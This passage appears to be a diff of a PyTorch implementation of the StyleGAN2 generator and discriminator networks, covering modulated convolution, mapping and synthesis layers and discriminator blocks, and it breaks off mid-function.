without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Network architectures from the paper -"Analyzing and Improving the Image Quality of StyleGAN". -Matches the original implementation of configs E-F by Karras et al. at -https://github.com/NVlabs/stylegan2/blob/master/training/networks_stylegan2.py""" - -import numpy as np -import torch -import torch.nn.functional as F -from torch_utils import misc -from torch_utils import persistence -from torch_utils.ops import conv2d_resample -from torch_utils.ops import upfirdn2d -from torch_utils.ops import bias_act -from torch_utils.ops import fma - -# ---------------------------------------------------------------------------- - - -@misc.profiled_function -def normalize_2nd_moment(x, dim=1, eps=1e-8): - return x * (x.square().mean(dim=dim, keepdim=True) + eps).rsqrt() - -# ---------------------------------------------------------------------------- - - -@misc.profiled_function -def modulated_conv2d( - # Input tensor of shape [batch_size, in_channels, in_height, in_width]. - x, - # Weight tensor of shape [out_channels, in_channels, kernel_height, kernel_width]. - weight, - # Modulation coefficients of shape [batch_size, in_channels]. - styles, - noise=None, # Optional noise tensor to add to the output activations. - up=1, # Integer upsampling factor. - down=1, # Integer downsampling factor. - padding=0, # Padding with respect to the upsampled image. - # Low-pass filter to apply when resampling activations. Must be prepared beforehand by calling upfirdn2d.setup_filter(). - resample_filter=None, - demodulate=True, # Apply weight demodulation? - # False = convolution, True = correlation (matches torch.nn.functional.conv2d). - flip_weight=True, - # Perform modulation, convolution, and demodulation as a single fused operation? - fused_modconv=True, -): - batch_size = x.shape[0] - out_channels, in_channels, kh, kw = weight.shape - misc.assert_shape(weight, [out_channels, in_channels, kh, kw]) # [OIkk] - misc.assert_shape(x, [batch_size, in_channels, None, None]) # [NIHW] - misc.assert_shape(styles, [batch_size, in_channels]) # [NI] - - # Pre-normalize inputs to avoid FP16 overflow. - if x.dtype == torch.float16 and demodulate: - weight = weight * (1 / np.sqrt(in_channels * kh * kw) / - weight.norm(float('inf'), dim=[1, 2, 3], keepdim=True)) # max_Ikk - styles = styles / \ - styles.norm(float('inf'), dim=1, keepdim=True) # max_I - - # Calculate per-sample weights and demodulation coefficients. - w = None - dcoefs = None - if demodulate or fused_modconv: - w = weight.unsqueeze(0) # [NOIkk] - w = w * styles.reshape(batch_size, 1, -1, 1, 1) # [NOIkk] - if demodulate: - dcoefs = (w.square().sum(dim=[2, 3, 4]) + 1e-8).rsqrt() # [NO] - if demodulate and fused_modconv: - w = w * dcoefs.reshape(batch_size, -1, 1, 1, 1) # [NOIkk] - - # Execute by scaling the activations before and after the convolution. - if not fused_modconv: - x = x * styles.to(x.dtype).reshape(batch_size, -1, 1, 1) - x = conv2d_resample.conv2d_resample(x=x, w=weight.to( - x.dtype), f=resample_filter, up=up, down=down, padding=padding, flip_weight=flip_weight) - if demodulate and noise is not None: - x = fma.fma(x, dcoefs.to(x.dtype).reshape( - batch_size, -1, 1, 1), noise.to(x.dtype)) - elif demodulate: - x = x * dcoefs.to(x.dtype).reshape(batch_size, -1, 1, 1) - elif noise is not None: - x = x.add_(noise.to(x.dtype)) - return x - - # Execute as one fused op using grouped convolution. - with misc.suppress_tracer_warnings(): # this value will be treated as a constant - batch_size = int(batch_size) - misc.assert_shape(x, [batch_size, in_channels, None, None]) - x = x.reshape(1, -1, *x.shape[2:]) - w = w.reshape(-1, in_channels, kh, kw) - x = conv2d_resample.conv2d_resample(x=x, w=w.to( - x.dtype), f=resample_filter, up=up, down=down, padding=padding, groups=batch_size, flip_weight=flip_weight) - x = x.reshape(batch_size, -1, *x.shape[2:]) - if noise is not None: - x = x.add_(noise) - return x - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class FullyConnectedLayer(torch.nn.Module): - def __init__(self, - in_features, # Number of input features. - out_features, # Number of output features. - bias=True, # Apply additive bias before the activation function? - # Activation function: 'relu', 'lrelu', etc. - activation='linear', - lr_multiplier=1, # Learning rate multiplier. - bias_init=0, # Initial value for the additive bias. - ): - super().__init__() - self.in_features = in_features - self.out_features = out_features - self.activation = activation - self.weight = torch.nn.Parameter(torch.randn( - [out_features, in_features]) / lr_multiplier) - self.bias = torch.nn.Parameter(torch.full( - [out_features], np.float32(bias_init))) if bias else None - self.weight_gain = lr_multiplier / np.sqrt(in_features) - self.bias_gain = lr_multiplier - - def forward(self, x): - w = self.weight.to(x.dtype) * self.weight_gain - b = self.bias - if b is not None: - b = b.to(x.dtype) - if self.bias_gain != 1: - b = b * self.bias_gain - - if self.activation == 'linear' and b is not None: - x = torch.addmm(b.unsqueeze(0), x, w.t()) - else: - x = x.matmul(w.t()) - x = bias_act.bias_act(x, b, act=self.activation) - return x - - def extra_repr(self): - return f'in_features={self.in_features:d}, out_features={self.out_features:d}, activation={self.activation:s}' - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class Conv2dLayer(torch.nn.Module): - def __init__(self, - in_channels, # Number of input channels. - out_channels, # Number of output channels. - # Width and height of the convolution kernel. - kernel_size, - bias=True, # Apply additive bias before the activation function? - # Activation function: 'relu', 'lrelu', etc. - activation='linear', - up=1, # Integer upsampling factor. - down=1, # Integer downsampling factor. - # Low-pass filter to apply when resampling activations. - resample_filter=[1, 3, 3, 1], - # Clamp the output to +-X, None = disable clamping. - conv_clamp=None, - channels_last=False, # Expect the input to have memory_format=channels_last? - trainable=True, # Update the weights of this layer during training? - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.activation = activation - self.up = up - self.down = down - self.conv_clamp = conv_clamp - self.register_buffer( - 'resample_filter', upfirdn2d.setup_filter(resample_filter)) - self.padding = kernel_size // 2 - self.weight_gain = 1 / np.sqrt(in_channels * (kernel_size ** 2)) - self.act_gain = bias_act.activation_funcs[activation].def_gain - - memory_format = torch.channels_last if channels_last else torch.contiguous_format - weight = torch.randn([out_channels, in_channels, kernel_size, kernel_size]).to( - memory_format=memory_format) - bias = torch.zeros([out_channels]) if bias else None - if trainable: - self.weight = torch.nn.Parameter(weight) - self.bias = torch.nn.Parameter(bias) if bias is not None else None - else: - self.register_buffer('weight', weight) - if bias is not None: - self.register_buffer('bias', bias) - else: - self.bias = None - - def forward(self, x, gain=1): - w = self.weight * self.weight_gain - b = self.bias.to(x.dtype) if self.bias is not None else None - flip_weight = (self.up == 1) # slightly faster - x = conv2d_resample.conv2d_resample(x=x, w=w.to( - x.dtype), f=self.resample_filter, up=self.up, down=self.down, padding=self.padding, flip_weight=flip_weight) - - act_gain = self.act_gain * gain - act_clamp = self.conv_clamp * gain if self.conv_clamp is not None else None - x = bias_act.bias_act(x, b, act=self.activation, - gain=act_gain, clamp=act_clamp) - return x - - def extra_repr(self): - return ' '.join([ - f'in_channels={self.in_channels:d}, out_channels={self.out_channels:d}, activation={self.activation:s},', - f'up={self.up}, down={self.down}']) - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class MappingNetwork(torch.nn.Module): - def __init__(self, - # Input latent (Z) dimensionality, 0 = no latent. - z_dim, - # Conditioning label (C) dimensionality, 0 = no label. - c_dim, - # Intermediate latent (W) dimensionality. - w_dim, - # Number of intermediate latents to output, None = do not broadcast. - num_ws, - num_layers=8, # Number of mapping layers. - # Label embedding dimensionality, None = same as w_dim. - embed_features=None, - # Number of intermediate features in the mapping layers, None = same as w_dim. - layer_features=None, - # Activation function: 'relu', 'lrelu', etc. - activation='lrelu', - # Learning rate multiplier for the mapping layers. - lr_multiplier=0.01, - # Decay for tracking the moving average of W during training, None = do not track. - w_avg_beta=0.998, - ): - super().__init__() - self.z_dim = z_dim - self.c_dim = c_dim - self.w_dim = w_dim - self.num_ws = num_ws - self.num_layers = num_layers - self.w_avg_beta = w_avg_beta - - if embed_features is None: - embed_features = w_dim - if c_dim == 0: - embed_features = 0 - if layer_features is None: - layer_features = w_dim - features_list = [z_dim + embed_features] + \ - [layer_features] * (num_layers - 1) + [w_dim] - - if c_dim > 0: - self.embed = FullyConnectedLayer(c_dim, embed_features) - for idx in range(num_layers): - in_features = features_list[idx] - out_features = features_list[idx + 1] - layer = FullyConnectedLayer( - in_features, out_features, activation=activation, lr_multiplier=lr_multiplier) - setattr(self, f'fc{idx}', layer) - - if num_ws is not None and w_avg_beta is not None: - self.register_buffer('w_avg', torch.zeros([w_dim])) - - def forward(self, z, c, truncation_psi=1, truncation_cutoff=None, update_emas=False): - # Embed, normalize, and concat inputs. - x = None - with torch.autograd.profiler.record_function('input'): - if self.z_dim > 0: - misc.assert_shape(z, [None, self.z_dim]) - x = normalize_2nd_moment(z.to(torch.float32)) - if self.c_dim > 0: - misc.assert_shape(c, [None, self.c_dim]) - y = normalize_2nd_moment(self.embed(c.to(torch.float32))) - x = torch.cat([x, y], dim=1) if x is not None else y - - # Main layers. - for idx in range(self.num_layers): - layer = getattr(self, f'fc{idx}') - x = layer(x) - - # Update moving average of W. - if update_emas and self.w_avg_beta is not None: - with torch.autograd.profiler.record_function('update_w_avg'): - self.w_avg.copy_(x.detach().mean( - dim=0).lerp(self.w_avg, self.w_avg_beta)) - - # Broadcast. - if self.num_ws is not None: - with torch.autograd.profiler.record_function('broadcast'): - x = x.unsqueeze(1).repeat([1, self.num_ws, 1]) - - # Apply truncation. - if truncation_psi != 1: - with torch.autograd.profiler.record_function('truncate'): - assert self.w_avg_beta is not None - if self.num_ws is None or truncation_cutoff is None: - x = self.w_avg.lerp(x, truncation_psi) - else: - x[:, :truncation_cutoff] = self.w_avg.lerp( - x[:, :truncation_cutoff], truncation_psi) - return x - - def extra_repr(self): - return f'z_dim={self.z_dim:d}, c_dim={self.c_dim:d}, w_dim={self.w_dim:d}, num_ws={self.num_ws:d}' - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class SynthesisLayer(torch.nn.Module): - def __init__(self, - in_channels, # Number of input channels. - out_channels, # Number of output channels. - # Intermediate latent (W) dimensionality. - w_dim, - resolution, # Resolution of this layer. - kernel_size=3, # Convolution kernel size. - up=1, # Integer upsampling factor. - use_noise=True, # Enable noise input? - # Activation function: 'relu', 'lrelu', etc. - activation='lrelu', - # Low-pass filter to apply when resampling activations. - resample_filter=[1, 3, 3, 1], - # Clamp the output of convolution layers to +-X, None = disable clamping. - conv_clamp=None, - channels_last=False, # Use channels_last format for the weights? - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.w_dim = w_dim - self.resolution = resolution - self.up = up - self.use_noise = use_noise - self.activation = activation - self.conv_clamp = conv_clamp - self.register_buffer( - 'resample_filter', upfirdn2d.setup_filter(resample_filter)) - self.padding = kernel_size // 2 - self.act_gain = bias_act.activation_funcs[activation].def_gain - - self.affine = FullyConnectedLayer(w_dim, in_channels, bias_init=1) - memory_format = torch.channels_last if channels_last else torch.contiguous_format - self.weight = torch.nn.Parameter(torch.randn( - [out_channels, in_channels, kernel_size, kernel_size]).to(memory_format=memory_format)) - if use_noise: - self.register_buffer( - 'noise_const', torch.randn([resolution, resolution])) - self.noise_strength = torch.nn.Parameter(torch.zeros([])) - self.bias = torch.nn.Parameter(torch.zeros([out_channels])) - - def forward(self, x, w, noise_mode='random', fused_modconv=True, gain=1): - assert noise_mode in ['random', 'const', 'none'] - in_resolution = self.resolution // self.up - misc.assert_shape(x, [None, self.in_channels, - in_resolution, in_resolution]) - styles = self.affine(w) - - noise = None - if self.use_noise and noise_mode == 'random': - noise = torch.randn([x.shape[0], 1, self.resolution, - self.resolution], device=x.device) * self.noise_strength - if self.use_noise and noise_mode == 'const': - noise = self.noise_const * self.noise_strength - - flip_weight = (self.up == 1) # slightly faster - x = modulated_conv2d(x=x, weight=self.weight, styles=styles, noise=noise, up=self.up, - padding=self.padding, resample_filter=self.resample_filter, flip_weight=flip_weight, fused_modconv=fused_modconv) - - act_gain = self.act_gain * gain - act_clamp = self.conv_clamp * gain if self.conv_clamp is not None else None - x = bias_act.bias_act(x, self.bias.to( - x.dtype), act=self.activation, gain=act_gain, clamp=act_clamp) - return x - - def extra_repr(self): - return ' '.join([ - f'in_channels={self.in_channels:d}, out_channels={self.out_channels:d}, w_dim={self.w_dim:d},', - f'resolution={self.resolution:d}, up={self.up}, activation={self.activation:s}']) - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class ToRGBLayer(torch.nn.Module): - def __init__(self, in_channels, out_channels, w_dim, kernel_size=1, conv_clamp=None, channels_last=False): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.w_dim = w_dim - self.conv_clamp = conv_clamp - self.affine = FullyConnectedLayer(w_dim, in_channels, bias_init=1) - memory_format = torch.channels_last if channels_last else torch.contiguous_format - self.weight = torch.nn.Parameter(torch.randn( - [out_channels, in_channels, kernel_size, kernel_size]).to(memory_format=memory_format)) - self.bias = torch.nn.Parameter(torch.zeros([out_channels])) - self.weight_gain = 1 / np.sqrt(in_channels * (kernel_size ** 2)) - - def forward(self, x, w, fused_modconv=True): - styles = self.affine(w) * self.weight_gain - x = modulated_conv2d(x=x, weight=self.weight, styles=styles, - demodulate=False, fused_modconv=fused_modconv) - x = bias_act.bias_act(x, self.bias.to(x.dtype), clamp=self.conv_clamp) - return x - - def extra_repr(self): - return f'in_channels={self.in_channels:d}, out_channels={self.out_channels:d}, w_dim={self.w_dim:d}' - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class SynthesisBlock(torch.nn.Module): - def __init__(self, - # Number of input channels, 0 = first block. - in_channels, - # Number of output channels. - out_channels, - # Intermediate latent (W) dimensionality. - w_dim, - # Resolution of this block. - resolution, - # Number of output color channels. - img_channels, - is_last, # Is this the last block? - # Architecture: 'orig', 'skip', 'resnet'. - architecture='skip', - # Low-pass filter to apply when resampling activations. - resample_filter=[1, 3, 3, 1], - # Clamp the output of convolution layers to +-X, None = disable clamping. - conv_clamp=256, - use_fp16=False, # Use FP16 for this block? - fp16_channels_last=False, # Use channels-last memory format with FP16? - # Default value of fused_modconv. 'inference_only' = True for inference, False for training. - fused_modconv_default=True, - # Arguments for SynthesisLayer. - **layer_kwargs, - ): - assert architecture in ['orig', 'skip', 'resnet'] - super().__init__() - self.in_channels = in_channels - self.w_dim = w_dim - self.resolution = resolution - self.img_channels = img_channels - self.is_last = is_last - self.architecture = architecture - self.use_fp16 = use_fp16 - self.channels_last = (use_fp16 and fp16_channels_last) - self.fused_modconv_default = fused_modconv_default - self.register_buffer( - 'resample_filter', upfirdn2d.setup_filter(resample_filter)) - self.num_conv = 0 - self.num_torgb = 0 - - if in_channels == 0: - self.const = torch.nn.Parameter(torch.randn( - [out_channels, resolution, resolution])) - - if in_channels != 0: - self.conv0 = SynthesisLayer(in_channels, out_channels, w_dim=w_dim, resolution=resolution, up=2, - resample_filter=resample_filter, conv_clamp=conv_clamp, channels_last=self.channels_last, **layer_kwargs) - self.num_conv += 1 - - self.conv1 = SynthesisLayer(out_channels, out_channels, w_dim=w_dim, resolution=resolution, - conv_clamp=conv_clamp, channels_last=self.channels_last, **layer_kwargs) - self.num_conv += 1 - - if is_last or architecture == 'skip': - self.torgb = ToRGBLayer(out_channels, img_channels, w_dim=w_dim, - conv_clamp=conv_clamp, channels_last=self.channels_last) - self.num_torgb += 1 - - if in_channels != 0 and architecture == 'resnet': - self.skip = Conv2dLayer(in_channels, out_channels, kernel_size=1, bias=False, up=2, - resample_filter=resample_filter, channels_last=self.channels_last) - - def forward(self, x, img, ws, force_fp32=False, fused_modconv=None, update_emas=False, **layer_kwargs): - _ = update_emas # unused - misc.assert_shape( - ws, [None, self.num_conv + self.num_torgb, self.w_dim]) - w_iter = iter(ws.unbind(dim=1)) - if ws.device.type != 'cuda': - force_fp32 = True - dtype = torch.float16 if self.use_fp16 and not force_fp32 else torch.float32 - memory_format = torch.channels_last if self.channels_last and not force_fp32 else torch.contiguous_format - if fused_modconv is None: - fused_modconv = self.fused_modconv_default - if fused_modconv == 'inference_only': - fused_modconv = (not self.training) - - # Input. - if self.in_channels == 0: - x = self.const.to(dtype=dtype, memory_format=memory_format) - x = x.unsqueeze(0).repeat([ws.shape[0], 1, 1, 1]) - else: - misc.assert_shape(x, [None, self.in_channels, - self.resolution // 2, self.resolution // 2]) - x = x.to(dtype=dtype, memory_format=memory_format) - - # Main layers. - if self.in_channels == 0: - x = self.conv1(x, next(w_iter), - fused_modconv=fused_modconv, **layer_kwargs) - elif self.architecture == 'resnet': - y = self.skip(x, gain=np.sqrt(0.5)) - x = self.conv0(x, next(w_iter), - fused_modconv=fused_modconv, **layer_kwargs) - x = self.conv1(x, next(w_iter), fused_modconv=fused_modconv, - gain=np.sqrt(0.5), **layer_kwargs) - x = y.add_(x) - else: - x = self.conv0(x, next(w_iter), - fused_modconv=fused_modconv, **layer_kwargs) - x = self.conv1(x, next(w_iter), - fused_modconv=fused_modconv, **layer_kwargs) - - # ToRGB. - if img is not None: - misc.assert_shape( - img, [None, self.img_channels, self.resolution // 2, self.resolution // 2]) - img = upfirdn2d.upsample2d(img, self.resample_filter) - if self.is_last or self.architecture == 'skip': - y = self.torgb(x, next(w_iter), fused_modconv=fused_modconv) - y = y.to(dtype=torch.float32, - memory_format=torch.contiguous_format) - img = img.add_(y) if img is not None else y - - assert x.dtype == dtype - assert img is None or img.dtype == torch.float32 - return x, img - - def extra_repr(self): - return f'resolution={self.resolution:d}, architecture={self.architecture:s}' - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class SynthesisNetwork(torch.nn.Module): - def __init__(self, - # Intermediate latent (W) dimensionality. - w_dim, - img_resolution, # Output image resolution. - img_channels, # Number of color channels. - # Overall multiplier for the number of channels. - channel_base=32768, - # Maximum number of channels in any layer. - channel_max=512, - # Use FP16 for the N highest resolutions. - num_fp16_res=4, - **block_kwargs, # Arguments for SynthesisBlock. - ): - assert img_resolution >= 4 and img_resolution & ( - img_resolution - 1) == 0 - super().__init__() - self.w_dim = w_dim - self.img_resolution = img_resolution - self.img_resolution_log2 = int(np.log2(img_resolution)) - self.img_channels = img_channels - self.num_fp16_res = num_fp16_res - self.block_resolutions = [ - 2 ** i for i in range(2, self.img_resolution_log2 + 1)] - channels_dict = {res: min(channel_base // res, channel_max) - for res in self.block_resolutions} - fp16_resolution = max( - 2 ** (self.img_resolution_log2 + 1 - num_fp16_res), 8) - - self.num_ws = 0 - for res in self.block_resolutions: - in_channels = channels_dict[res // 2] if res > 4 else 0 - out_channels = channels_dict[res] - use_fp16 = (res >= fp16_resolution) - is_last = (res == self.img_resolution) - block = SynthesisBlock(in_channels, out_channels, w_dim=w_dim, resolution=res, - img_channels=img_channels, is_last=is_last, use_fp16=use_fp16, **block_kwargs) - self.num_ws += block.num_conv - if is_last: - self.num_ws += block.num_torgb - setattr(self, f'b{res}', block) - - def forward(self, ws, return_feature=False, **block_kwargs): - block_ws = [] - features = [] - with torch.autograd.profiler.record_function('split_ws'): - misc.assert_shape(ws, [None, self.num_ws, self.w_dim]) - ws = ws.to(torch.float32) - w_idx = 0 - for res in self.block_resolutions: - block = getattr(self, f'b{res}') - block_ws.append( - ws.narrow(1, w_idx, block.num_conv + block.num_torgb)) - w_idx += block.num_conv - - x = img = None - for res, cur_ws in zip(self.block_resolutions, block_ws): - block = getattr(self, f'b{res}') - x, img = block(x, img, cur_ws, **block_kwargs) - features.append(x) - if return_feature: - return img, features - else: - return img - - def extra_repr(self): - return ' '.join([ - f'w_dim={self.w_dim:d}, num_ws={self.num_ws:d},', - f'img_resolution={self.img_resolution:d}, img_channels={self.img_channels:d},', - f'num_fp16_res={self.num_fp16_res:d}']) - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class Generator(torch.nn.Module): - def __init__(self, - z_dim, # Input latent (Z) dimensionality. - # Conditioning label (C) dimensionality. - c_dim, - # Intermediate latent (W) dimensionality. - w_dim, - img_resolution, # Output resolution. - img_channels, # Number of output color channels. - mapping_kwargs={}, # Arguments for MappingNetwork. - synthesis_kwargs={}, # Arguments for SynthesisNetwork. - resize=None, - # **synthesis_kwargs, # Arguments for SynthesisNetwork. - ): - super().__init__() - self.z_dim = z_dim - self.c_dim = c_dim - self.w_dim = w_dim - self.img_resolution = img_resolution - self.img_channels = img_channels - self.synthesis = SynthesisNetwork( - w_dim=w_dim, img_resolution=img_resolution, img_channels=img_channels, **synthesis_kwargs) - self.num_ws = self.synthesis.num_ws - self.mapping = MappingNetwork( - z_dim=z_dim, c_dim=c_dim, w_dim=w_dim, num_ws=self.num_ws, **mapping_kwargs) - self.resize = resize - - def forward(self, z, c, truncation_psi=1, truncation_cutoff=None, update_emas=False, input_is_w=False, return_feature=False, **synthesis_kwargs): - if input_is_w: - ws = z - if ws.dim() == 2: - ws = ws.unsqueeze(1).repeat([1, self.mapping.num_ws, 1]) - else: - ws = self.mapping(z, c, truncation_psi=truncation_psi, - truncation_cutoff=truncation_cutoff, update_emas=update_emas) - img = self.synthesis(ws, update_emas=update_emas, - return_feature=return_feature, **synthesis_kwargs) - if self.resize is not None: - img = imresize(img, [self.resize, self.resize]) - return img - - -def imresize(image, size): - dim = image.dim() - if dim == 3: - image = image.unsqueeze(1) - b, _, h, w = image.shape - if size[0] > h: - image = F.interpolate(image, size, mode='bilinear') - elif size[0] < h: - image = F.interpolate(image, size, mode='area') - if dim == 3: - image = image.squeeze(1) - return image - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class DiscriminatorBlock(torch.nn.Module): - def __init__(self, - # Number of input channels, 0 = first block. - in_channels, - # Number of intermediate channels. - tmp_channels, - # Number of output channels. - out_channels, - # Resolution of this block. - resolution, - # Number of input color channels. - img_channels, - # Index of the first layer. - first_layer_idx, - # Architecture: 'orig', 'skip', 'resnet'. - architecture='resnet', - # Activation function: 'relu', 'lrelu', etc. - activation='lrelu', - # Low-pass filter to apply when resampling activations. - resample_filter=[1, 3, 3, 1], - # Clamp the output of convolution layers to +-X, None = disable clamping. - conv_clamp=None, - use_fp16=False, # Use FP16 for this block? - fp16_channels_last=False, # Use channels-last memory format with FP16? - # Freeze-D: Number of layers to freeze. - freeze_layers=0, - ): - assert in_channels in [0, tmp_channels] - assert architecture in ['orig', 'skip', 'resnet'] - super().__init__() - self.in_channels = in_channels - self.resolution = resolution - self.img_channels = img_channels - self.first_layer_idx = first_layer_idx - self.architecture = architecture - self.use_fp16 = use_fp16 - self.channels_last = (use_fp16 and fp16_channels_last) - self.register_buffer( - 'resample_filter', upfirdn2d.setup_filter(resample_filter)) - - self.num_layers = 0 - - def trainable_gen(): - while True: - layer_idx = self.first_layer_idx + self.num_layers - trainable = (layer_idx >= freeze_layers) - self.num_layers += 1 - yield trainable - trainable_iter = trainable_gen() - - if in_channels == 0 or architecture == 'skip': - self.fromrgb = Conv2dLayer(img_channels, tmp_channels, kernel_size=1, activation=activation, - trainable=next(trainable_iter), conv_clamp=conv_clamp, channels_last=self.channels_last) - - self.conv0 = Conv2dLayer(tmp_channels, tmp_channels, kernel_size=3, activation=activation, - trainable=next(trainable_iter), conv_clamp=conv_clamp, channels_last=self.channels_last) - - self.conv1 = Conv2dLayer(tmp_channels, out_channels, kernel_size=3, activation=activation, down=2, - trainable=next(trainable_iter), resample_filter=resample_filter, conv_clamp=conv_clamp, channels_last=self.channels_last) - - if architecture == 'resnet': - self.skip = Conv2dLayer(tmp_channels, out_channels, kernel_size=1, bias=False, down=2, - trainable=next(trainable_iter), resample_filter=resample_filter, channels_last=self.channels_last) - - def forward(self, x, img, force_fp32=False): - if (x if x is not None else img).device.type != 'cuda': - force_fp32 = True - dtype = torch.float16 if self.use_fp16 and not force_fp32 else torch.float32 - memory_format = torch.channels_last if self.channels_last and not force_fp32 else torch.contiguous_format - - # Input. - if x is not None: - misc.assert_shape(x, [None, self.in_channels, - self.resolution, self.resolution]) - x = x.to(dtype=dtype, memory_format=memory_format) - - # FromRGB. - if self.in_channels == 0 or self.architecture == 'skip': - misc.assert_shape( - img, [None, self.img_channels, self.resolution, self.resolution]) - img = img.to(dtype=dtype, memory_format=memory_format) - y = self.fromrgb(img) - x = x + y if x is not None else y - img = upfirdn2d.downsample2d( - img, self.resample_filter) if self.architecture == 'skip' else None - - # Main layers. - if self.architecture == 'resnet': - y = self.skip(x, gain=np.sqrt(0.5)) - x = self.conv0(x) - x = self.conv1(x, gain=np.sqrt(0.5)) - x = y.add_(x) - else: - x = self.conv0(x) - x = self.conv1(x) - - assert x.dtype == dtype - return x, img - - def extra_repr(self): - return f'resolution={self.resolution:d}, architecture={self.architecture:s}' - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class MinibatchStdLayer(torch.nn.Module): - def __init__(self, group_size, num_channels=1): - super().__init__() - self.group_size = group_size - self.num_channels = num_channels - - def forward(self, x): - N, C, H, W = x.shape - with misc.suppress_tracer_warnings(): # as_tensor results are registered as constants - G = torch.min(torch.as_tensor(self.group_size), torch.as_tensor( - N)) if self.group_size is not None else N - F = self.num_channels - c = C // F - - # [GnFcHW] Split minibatch N into n groups of size G, and channels C into F groups of size c. - y = x.reshape(G, -1, F, c, H, W) - # [GnFcHW] Subtract mean over group. - y = y - y.mean(dim=0) - # [nFcHW] Calc variance over group. - y = y.square().mean(dim=0) - y = (y + 1e-8).sqrt() # [nFcHW] Calc stddev over group. - # [nF] Take average over channels and pixels. - y = y.mean(dim=[2, 3, 4]) - y = y.reshape(-1, F, 1, 1) # [nF11] Add missing dimensions. - # [NFHW] Replicate over group and pixels. - y = y.repeat(G, 1, H, W) - # [NCHW] Append to input as new channels. - x = torch.cat([x, y], dim=1) - return x - - def extra_repr(self): - return f'group_size={self.group_size}, num_channels={self.num_channels:d}' - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class DiscriminatorEpilogue(torch.nn.Module): - def __init__(self, - in_channels, # Number of input channels. - # Dimensionality of mapped conditioning label, 0 = no label. - cmap_dim, - resolution, # Resolution of this block. - # Number of input color channels. - img_channels, - # Architecture: 'orig', 'skip', 'resnet'. - architecture='resnet', - # Group size for the minibatch standard deviation layer, None = entire minibatch. - mbstd_group_size=4, - # Number of features for the minibatch standard deviation layer, 0 = disable. - mbstd_num_channels=1, - # Activation function: 'relu', 'lrelu', etc. - activation='lrelu', - # Clamp the output of convolution layers to +-X, None = disable clamping. - conv_clamp=None, - ): - assert architecture in ['orig', 'skip', 'resnet'] - super().__init__() - self.in_channels = in_channels - self.cmap_dim = cmap_dim - self.resolution = resolution - self.img_channels = img_channels - self.architecture = architecture - - if architecture == 'skip': - self.fromrgb = Conv2dLayer( - img_channels, in_channels, kernel_size=1, activation=activation) - self.mbstd = MinibatchStdLayer( - group_size=mbstd_group_size, num_channels=mbstd_num_channels) if mbstd_num_channels > 0 else None - self.conv = Conv2dLayer(in_channels + mbstd_num_channels, in_channels, - kernel_size=3, activation=activation, conv_clamp=conv_clamp) - self.fc = FullyConnectedLayer( - in_channels * (resolution ** 2), in_channels, activation=activation) - self.out = FullyConnectedLayer( - in_channels, 1 if cmap_dim == 0 else cmap_dim) - - def forward(self, x, img, cmap, force_fp32=False): - misc.assert_shape(x, [None, self.in_channels, - self.resolution, self.resolution]) # [NCHW] - _ = force_fp32 # unused - dtype = torch.float32 - memory_format = torch.contiguous_format - - # FromRGB. - x = x.to(dtype=dtype, memory_format=memory_format) - if self.architecture == 'skip': - misc.assert_shape( - img, [None, self.img_channels, self.resolution, self.resolution]) - img = img.to(dtype=dtype, memory_format=memory_format) - x = x + self.fromrgb(img) - - # Main layers. - if self.mbstd is not None: - x = self.mbstd(x) - x = self.conv(x) - x = self.fc(x.flatten(1)) - x = self.out(x) - - # Conditioning. - if self.cmap_dim > 0: - misc.assert_shape(cmap, [None, self.cmap_dim]) - x = (x * cmap).sum(dim=1, keepdim=True) * \ - (1 / np.sqrt(self.cmap_dim)) - - assert x.dtype == dtype - return x - - def extra_repr(self): - return f'resolution={self.resolution:d}, architecture={self.architecture:s}' - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class Discriminator(torch.nn.Module): - def __init__(self, - # Conditioning label (C) dimensionality. - c_dim, - img_resolution, # Input resolution. - # Number of input color channels. - img_channels, - # Architecture: 'orig', 'skip', 'resnet'. - architecture='resnet', - # Overall multiplier for the number of channels. - channel_base=32768, - # Maximum number of channels in any layer. - channel_max=512, - # Use FP16 for the N highest resolutions. - num_fp16_res=4, - # Clamp the output of convolution layers to +-X, None = disable clamping. - conv_clamp=256, - # Dimensionality of mapped conditioning label, None = default. - cmap_dim=None, - block_kwargs={}, # Arguments for DiscriminatorBlock. - mapping_kwargs={}, # Arguments for MappingNetwork. - # Arguments for DiscriminatorEpilogue. - epilogue_kwargs={}, - ): - super().__init__() - self.c_dim = c_dim - self.img_resolution = img_resolution - self.img_resolution_log2 = int(np.log2(img_resolution)) - self.img_channels = img_channels - self.block_resolutions = [ - 2 ** i for i in range(self.img_resolution_log2, 2, -1)] - channels_dict = {res: min(channel_base // res, channel_max) - for res in self.block_resolutions + [4]} - fp16_resolution = max( - 2 ** (self.img_resolution_log2 + 1 - num_fp16_res), 8) - - if cmap_dim is None: - cmap_dim = channels_dict[4] - if c_dim == 0: - cmap_dim = 0 - - common_kwargs = dict(img_channels=img_channels, - architecture=architecture, conv_clamp=conv_clamp) - cur_layer_idx = 0 - for res in self.block_resolutions: - in_channels = channels_dict[res] if res < img_resolution else 0 - tmp_channels = channels_dict[res] - out_channels = channels_dict[res // 2] - use_fp16 = (res >= fp16_resolution) - block = DiscriminatorBlock(in_channels, tmp_channels, out_channels, resolution=res, - first_layer_idx=cur_layer_idx, use_fp16=use_fp16, **block_kwargs, **common_kwargs) - setattr(self, f'b{res}', block) - cur_layer_idx += block.num_layers - if c_dim > 0: - self.mapping = MappingNetwork( - z_dim=0, c_dim=c_dim, w_dim=cmap_dim, num_ws=None, w_avg_beta=None, **mapping_kwargs) - self.b4 = DiscriminatorEpilogue( - channels_dict[4], cmap_dim=cmap_dim, resolution=4, **epilogue_kwargs, **common_kwargs) - - def forward(self, img, c, update_emas=False, **block_kwargs): - _ = update_emas # unused - x = None - for res in 